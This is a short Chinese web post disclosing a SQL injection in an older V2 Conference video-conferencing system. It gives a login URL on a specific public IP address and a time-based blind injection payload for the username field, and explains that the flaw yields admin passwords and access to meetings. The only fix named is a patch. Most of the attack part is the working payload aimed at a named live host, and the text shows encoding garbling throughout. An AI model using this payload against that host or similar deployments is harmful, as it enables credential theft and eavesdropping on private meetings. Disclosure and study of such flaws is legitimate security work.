|
|
|
綠盟視頻會(huì)議系統(tǒng)SQL注入
發(fā)布時(shí)間:2015-12-01 點(diǎn)擊率:次 來源:www.memoryoverflow.cn 作者:電腦技術(shù)學(xué)習(xí)網(wǎng)
通過注入能夠拿到管理賬戶密碼,然后登錄后臺(tái)查看會(huì)議密碼,通過會(huì)議密碼能夠進(jìn)入到遠(yuǎn)程會(huì)議中,惡意攻擊者能夠竊取某些敏感信息。
http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do
其實(shí)是V2 Conference視頻會(huì)議系統(tǒng)較低版本的SQL注入,注入發(fā)生在登錄時(shí)用戶名的輸入框內(nèi),使用以下注入語句可測(cè)試:
1 or (select benchmark(300000,md5(user())) from users where substring(username,1,5)=admin)#
修復(fù)方案:
升級(jí)補(bǔ)丁
來源 電腦技術(shù)網(wǎng) www.memoryoverflow.cn
發(fā)表留言
|
|
發(fā)表留言請(qǐng)先登錄!
|
免責(zé)聲明:本站發(fā)布的信息和評(píng)論純屬網(wǎng)民個(gè)人行為,并不代表本站立場(chǎng),如發(fā)現(xiàn)有違法信息或侵權(quán)行為,請(qǐng)直接與本站管理員聯(lián)系,我們將在收到您的信息后24小時(shí)內(nèi)作出處理!
Copyright © 十堰電腦維修 All Rights Reserved 鄂ICP備12000326號(hào)-1
電子郵箱:956066850@qq.com